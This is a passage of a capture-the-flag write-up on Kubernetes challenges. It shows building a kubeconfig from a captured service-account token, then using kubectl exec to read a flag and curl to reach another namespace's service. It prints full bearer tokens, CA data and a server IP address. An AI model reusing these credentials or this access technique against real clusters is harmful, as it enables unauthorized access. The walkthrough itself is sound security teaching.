&lt;figure class=&#34;highlight text&#34;&gt;&lt;figcaption&gt;&lt;span&gt;check&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Look here YOU will need this one believe me!!!&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; eyJhbGciOiJSUzI1NiIsImtpZCI6IkZwcWlIMGR2QlJ5Q0ZwTHV5a0JFQnlEcVI5UWZHLUdsY2NLQkkyMGlZWU0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJ0YXNrMiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJwb2QtbGlzdGVyLXRva2VuLXpoNHM2Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6InBvZC1saXN0ZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyZjc2YjA3ZS0wY2NjLTRhMDQtYWUxZi1jNGJhMzIxZjYzZmQiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6dGFzazI6cG9kLWxpc3RlciJ9.cewI8cdU8u-MxhLW5enn9bqj2DnD6Kn6iJZD2Y70uSIN-Pdq4VGrCNN0oB0edWaNZd_2o3NCVfE1GY9JRIjQeMuV_Uk5-tEQ62TS1b2hpHPoq8FtRFDyji26LyTR2XGU7gSYdQV6G8axOU3z8_RRWQarN5VfSgDp-WmwizjwWJLMhENGgvWBxOKjHrF0tDCEmshH1g841NB4XtzeiXRxEC1AN9kNv-7SZvYWasHbPuva-fsGBp-AvhUUTStcCVahZ8VElJ51q3VxKBTXX-DoDWfsVD5rOcCse0yj4jxgN3GIqjIaAcjBiPI2XmhQv-tMMbYpj7gfAxrzhdh77UfaBg&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;kubernetes-pody&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-pody&#34;&gt;#&lt;/a&gt; Kubernetes: Pody:&lt;/h2&gt;
&lt;p&gt;After getting the secrets we can move to the next challenge that named  &lt;code&gt;Pody&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/hZQya2W.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;In this challenge the author told us that the container is inside a pod! So how can we get inside that pod? Thinking a little bit we didn’t get any solution expect opening a shell session inside the pod!&lt;/p&gt;
&lt;p&gt;Kubectl Are you there?? Yes! It’s Kubectl time! I love to work with kubectl I will not waste my time curling endpoints 😃 So I’ll make my kubeconfig file for this challenge!&lt;/p&gt;
&lt;p&gt;When I checked the secrets in the previous challenge I got the certificate authority Certifcate. And of course don’t forget the token that we got!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This token is used for authentication and authorization in kubernetes. This authorization is occur on the api-server level not the etcd!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s make our kubeconfig! But wait! In case you don’t have kubectl, it’s time to install it! You can follow this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvdGFza3MvdG9vbHMvaW5zdGFsbC1rdWJlY3RsLWxpbnV4Lw==&#34;&gt;guide&lt;/span&gt; to install it&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;kubeconfig&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Config&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;clusters:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;cluster:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;certificate-authority-data:&lt;/span&gt;  &lt;span class=&#34;string&#34;&gt;LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJek1ETXdOVEV5TWpVMU1sb1hEVE16TURNd01qRXlNalUxTWxvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDEzCm0rOG5ySVlXU21hQjREMU9yWWJVS1hycE4rS2ZUZDk1TjA2UTQ5U3IyUU1FZkZXZHhjSGJadThRVWRIVXo1dFcKdmVvRnk4cFBpcmhhNHdGYnJEbXczdFp4NlgxbGxEZlp4b29jd1ZBOS9pMTBjNGE4TURvOGVuc1hlYWU1TytZcQpMZmdiM04zcWZYYjZmSHAzekwxeHJzWThPUEZVeHhmU3AxaElXa0RNZ0tZY0lhU2NoRVUzYTk0ZityY2tIOUFwCnltRi95TlB3bXgyU1RFZUVFSkZoZFdWUzVVamdSTmxnNzFPWklyb05DMXMzWEJxb2RiZ1FWUjBUeTI5bnJGc0QKQnBJQW1WQVRCS3QxTjcyRjRMRDA0c3M3QVUxU0NDSCtoUmlrTWE1ZkdtOTBjMWRacEVuZ1IyVEUwSzZ4WVY3TAplOElrcE5WOVBaLy9RT2ZqSnFFQ0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZBWWUzVktNRDY3T3V5NWhWTGxTN0RWeU52SExNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBSE9EMUNTNGQzNjJLRXE1dTZyQwpQOEF6a3hDMTJDdVF1bDh4aUVTajZ4M25wb25oT2M3WU0zRUhQZk5wNHRDZmNsdFpDMU51SXNrVDRuSkRLRTFYCjRNVFNOL0kxVDlGSHd5SUhNbDZMZm1RL1ZLVlo1YlZJMEZlUENQanFnOWZSbHFYaitsRUxJQnRJVE0xbUlmeW0KZlZmMisrS3h4OTFTME54bWRKUzU0amY1SUJMRVh2SnRiWFYrblZ1ekhER3l5eDREblVDMm4zR3NrcEtBOGRJRQpZZktRWk5IZjJ4L0FySWM2a3A0em9TSWI1RVQvdDk4b3p5R2pldlVnbDd1L0orUzkwTS9pWWgyaGlGSXRRVE1WCnBTa0pQM1lIbDlzWVRSS0dXZTBtcEtnVm1RZm9VTVNzdURrRnZ4ZFNhVG9QQUN6aUdxdUNnVXVyWHMxNXJjOWkKR2xBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;server:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;https://20.169.73.19:7443&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;raf-k8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;contexts:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;context:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ncsc-sa@raf-k8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;context:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;cluster:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;raf-k8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;user:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ncsc-sa&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;current-context:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ncsc-sa@raf-k8s&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;users:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ncsc-sa&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;user:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;token:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;eyJhbGciOiJSUzI1NiIsImtpZCI6IkZwcWlIMGR2QlJ5Q0ZwTHV5a0JFQnlEcVI5UWZHLUdsY2NLQkkyMGlZWU0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJ0YXNrMiIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJwb2QtbGlzdGVyLXRva2VuLXpoNHM2Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6InBvZC1saXN0ZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyZjc2YjA3ZS0wY2NjLTRhMDQtYWUxZi1jNGJhMzIxZjYzZmQiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6dGFzazI6cG9kLWxpc3RlciJ9.cewI8cdU8u-MxhLW5enn9bqj2DnD6Kn6iJZD2Y70uSIN-Pdq4VGrCNN0oB0edWaNZd_2o3NCVfE1GY9JRIjQeMuV_Uk5-tEQ62TS1b2hpHPoq8FtRFDyji26LyTR2XGU7gSYdQV6G8axOU3z8_RRWQarN5VfSgDp-WmwizjwWJLMhENGgvWBxOKjHrF0tDCEmshH1g841NB4XtzeiXRxEC1AN9kNv-7SZvYWasHbPuva-fsGBp-AvhUUTStcCVahZ8VElJ51q3VxKBTXX-DoDWfsVD5rOcCse0yj4jxgN3GIqjIaAcjBiPI2XmhQv-tMMbYpj7gfAxrzhdh77UfaBg&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This kubeconfig file will allow us to authenticate to the api-server using kubectl utility without wasting time specifying the token and other stuff!&lt;/p&gt;
&lt;p&gt;Assume that you save that file in name  &lt;code&gt;ncsc-k8s.conf&lt;/code&gt; . Let’s export the KUBECONFIG env var.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;$ &lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; KUBECONFIG=ncsc-k8s.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;$ kubectl get pods -n task2 &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME      READY   STATUS    RESTARTS        AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;web-app   1/1     Running   3 (2d19h ago)   17d&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo !! We got access and everything is ok until now. Let’s describe the pod and check what we have first before getting a shell !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;describe pod&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl describe pod web-app -n task2   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name:             web-app&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Namespace:        task2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    Mounts:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      /etc/nginx/flag.txt from flag-configmap (rw,path=&lt;span class=&#34;string&#34;&gt;&amp;quot;flag.txt&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      /var/cache/nginx from tmpfs-2 (rw)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      /var/run from tmpfs-1 (rw)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-wrfpc (ro)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Wow there is  &lt;code&gt;flag.txt&lt;/code&gt;  file inside the pod! Let’s be more accurate! The flag is in  &lt;code&gt;/etc/nginx/flag.txt&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let’s get a shell or run a command from the pod using the  &lt;code&gt;kubectl exec&lt;/code&gt;  command!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/6QTqehO.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Yes we got the flag! And another message: Your current token is enough!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I tried to delete the flag! But as expected the author make the pod Read-only file system&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Flag :  &lt;code&gt;Securinets&amp;#123;Ex3c_1s_DAnGer0uS_B3_C4r3fUL&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;kubernetes-hidden&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-hidden&#34;&gt;#&lt;/a&gt; Kubernetes: Hidden? :&lt;/h2&gt;
&lt;p&gt;We still have the same token! Our kubectl works fine. So no worries we can do it!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/1Eny78d.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;In this challenge the flag is hidden?? But how!? Let’s check first what can we do in our  &lt;code&gt;task3&lt;/code&gt;  namespace&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;service&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl get service -n task3        &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME      TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;web-app   ClusterIP   10.109.128.98   &amp;lt;none&amp;gt;        80/TCP    17d&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We can access to services! In case you don’t know what is service I recommend to check this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvY29uY2VwdHMvc2VydmljZXMtbmV0d29ya2luZy9zZXJ2aWNlLw==&#34;&gt;page&lt;/span&gt;. As we understand, There is a pod inside task3 namespace but we don’t have any access to it 😦!. No worries we still have services! This service as we can see its attached to that pod. Let’s get our flag!&lt;/p&gt;
&lt;p&gt;After a little bit of thinking, I got an idea! Let’s access to the service from our previous pod!&lt;/p&gt;
&lt;p&gt;YES MAN! pods and services can communicate between each others&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/uq3xAoV.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Ok let’s do it then, we have the service internal IP and we can run curl command inside our previous pod!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/DuPq2Sp.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Bingo! Flag:  &lt;code&gt;Securinets&amp;#123;K8s_S3rV1cEs_ArE_P0wErFull&amp;#125;&lt;/code&gt; &lt;br&gt;
And as Usual! another token for the next challenge :&lt;/p&gt;
&lt;figure class=&#34;highlight text&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;In The Next Challenge You will Need This one!&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; eyJhbGciOiJSUzI1NiIsImtpZCI6IkZwcWlIMGR2QlJ5Q0ZwTHV5a0JFQnlEcVI5UWZHLUdsY2NLQkkyMGlZWU0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJ0YXNrNCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJuY3NjLXBhcnRpY2lwYW50LXRva2VuLTdnZ2JxIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6Im5jc2MtcGFydGljaXBhbnQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIwNmM3OGJhZC01NjAwLTQ2N2QtYjdhYi0wNWQzN2RjMjg0MzIiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6dGFzazQ6bmNzYy1wYXJ0aWNpcGFudCJ9.exWa8skN0HdscxzG2PBFYn9eU9l_sL7hAjUw8sFPsnjUKHPHzmqwDpN4WfSPCHFOfv7KKimYvr9SuMjB75KuapxXKnyBwEaIZEkH3c0lavBCPYfGou_BrVsAHVSdbw6pQ9YYonuc3WTiGkcXC-XjKXfY8PGppmnGh7gUsuxY9xwpju10PutjIs8s0g9z2tTBYUhOraa54WRCODDGw-o415rXsaVHuV8A2Cj3jQZVBzXXi5-snfvjX27-nMyGDh4F0gu8sXD3PZfLjLdrOQpP6s_jzbUN9G1g8iLQTXNjCvgUw2cnBOvWtRGLtbdizOazlKUyJAOSXfmu3W45bMJPOg&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h2 id=&#34;kubernetes-special&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-special&#34;&gt;#&lt;/a&gt; Kubernetes: Special :&lt;/h2&gt;
&lt;p&gt;After getting the new token it’s time to edit the kubeconfig file! Just replace the old toke by the new one! To work with kubectl correctly!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/iFClk1V.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Something Special?? What a special? Everything in Kubernetes is SO Special!! So no worries, We can deal with that kind of things!&lt;/p&gt;
&lt;p&gt;Talking about something special take me to think about what we can call it  &lt;code&gt;Custom Resources Definition&lt;/code&gt;  in Kubernetes!&lt;/p&gt;
&lt;p&gt;In Kubernetes, a custom resource is an extension of the Kubernetes API that allows you to define your own custom resources with their own custom controllers.&lt;/p&gt;
&lt;p&gt;A custom resource definition (CRD) is used to create a new custom resource type in Kubernetes. A CRD defines the structure and behavior of the new custom resource, including its name, attributes, and API endpoints. Once a CRD is defined, instances of the custom resource can be created and managed using Kubernetes tools like kubectl and the Kubernetes API.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;api-resources&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl api-resources&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                              SHORTNAMES                                      APIVERSION                             NAMESPACED   KIND&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bindings                                                                          v1                                     &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;         Binding&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;componentstatuses                 cs                                              v1                                     &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;        ComponentStatus&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;configmaps                        cm                                              v1                                     &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;         ConfigMap&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;rolebindings                                                                      rbac.authorization.k8s.io/v1           &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;         RoleBinding&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;roles                                                                             rbac.authorization.k8s.io/v1           &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;         Role&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;priorityclasses                   pc                                              scheduling.k8s.io/v1                   &lt;span class=&#34;literal&#34;&gt;false&lt;/span&gt;        PriorityClass&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;ncscctfs                                                                          securinets.com/v1alpha1                &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;         NCSCCtf&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;But wait! I am right! There is an api-group and a custom resource called ncscctfs!&lt;/p&gt;
&lt;p&gt;Now it’s time to get the flag!&lt;/p&gt;
